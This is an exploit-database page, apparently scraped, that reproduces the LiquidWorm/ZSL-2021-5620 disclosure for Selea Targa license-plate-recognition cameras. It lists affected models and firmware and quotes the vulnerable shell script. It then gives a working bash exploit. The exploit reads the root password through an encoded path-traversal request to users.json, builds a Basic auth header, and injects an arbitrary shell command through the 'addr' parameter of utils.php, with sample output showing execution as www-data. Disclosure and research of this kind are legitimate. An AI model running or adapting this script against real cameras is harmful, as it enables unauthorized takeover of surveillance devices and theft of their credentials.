selea targa ip ocranpr camera addr remote code execution (unauthenticated)

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selea targa ip ocranpr camera addr remote code execution (unauthenticated) Code Code...
# Exploit Title: Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: #!/bin/bash # # Selea Targa IP OCR-ANPR Camera Unauthenticated Remote Code Execution # # # Vendor: Selea s.r.l. # Product web page: # Affected version: Model: iZero # Targa 512 # Targa 504 # Targa Semplice # Targa 704 TKM # Targa 805 # Targa 710 INOX # Targa 750 # Targa 704 ILB # Firmware: BLD201113005214 # BLD201106163745 # BLD200304170901 # BLD200304170514 # BLD200303143345 # BLD191118145435 # BLD191021180140 # BLD191021180140 # CPS: 4.013(201105) # 3.100(200225) # 3.005(191206) # 3.005(191112) # # Summary: IP camera with optical character recognition (OCR) software for automatic # number plate recognition (ANPR) also equipped with ADR system that enables it to read # the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number # of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number # plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes # this camera suitable for all installation conditions. Its built-in OCR software works # as an automatic and independent system without the need of a computer, thus giving # autonomy to the device even in the event of an interruption in the connection between # the camera and the operations centre. # # Desc: Selea suffers from an authenticated command injection vulnerability. This can be # exploited to inject and execute arbitrary shell commands as the www-data user through # the 'addr' and 'port' HTTP GET parameters in utils.php page. Chaining the unauthenticated # LFI issue an attacker can grab credentials, authenticate and execute system commands. # # ===================================================================================== # /mnt/app/scripts/ # ---------------------------------- # # 01: #!/bin/sh # 02: . /mnt/app/scripts/ # 03: . /mnt/app/scripts/ # 04: # 05: CMD="$1" # 06: ADDR="$2" # 07: PORT="$3" # 08: # 09: if [ "$CMD" == "ping" ]; then # 10: RESULT=$(/bin/ping -I eth0 -W 1 -q -c 1 "$ADDR" 2>&1 ) # 11: elif [ "$CMD" == "port" ]; then # 12: log "/usr/bin/nc -w 1 -v -z $ADDR $PORT" # 13: RESULT=$(/usr/bin/nc -w 1 -v -z "$ADDR" "$PORT" 2>&1 ) # 14: fi # 15: # 16: echo -e "$RESULT" # # ===================================================================================== # # Tested on: GNU/Linux 3.10.53 (armv7l) # PHP/5.6.22 # selea_httpd # HttpServer/0.1 # SeleaCPSHttpServer/1.1 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5620 # Advisory URL: # # # 07.11.2020 # # # PoC chained exploit (as admin): # # solidsnake@metalgear:~/prive$ ./ id # Password found: testingus # Using Authorization: YWRtaW46dGVzdGluZ3VzCg== # Using command: id # uid=33(www-data) gid=33(www-data) groups=33(www-data) # # IP=$1 CMD=$2 PWD=`curl -s http://${IP}/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json |grep -oP 'root_pwd": "\K.*?(?=",)'` echo 'Password found: '${PWD} AUTH=$(echo admin:${PWD} | base64) echo 'Using Authorization: '${AUTH} echo 'Using command: '${CMD} curl -s "http://${IP}/cgi-bin/utils.php?cmd=addr_check&addr=\$(${CMD})&type=port&port=80" -H "Authorization: Basic ${AUTH}" |grep -oP '\K.*?(?=")'

Selea targa ip ocranpr camera addr remote code execution (unauthenticated) Vulnerability / Exploit Source : Selea targa ip ocranpr camera addr remote code execution (unauthenticated)

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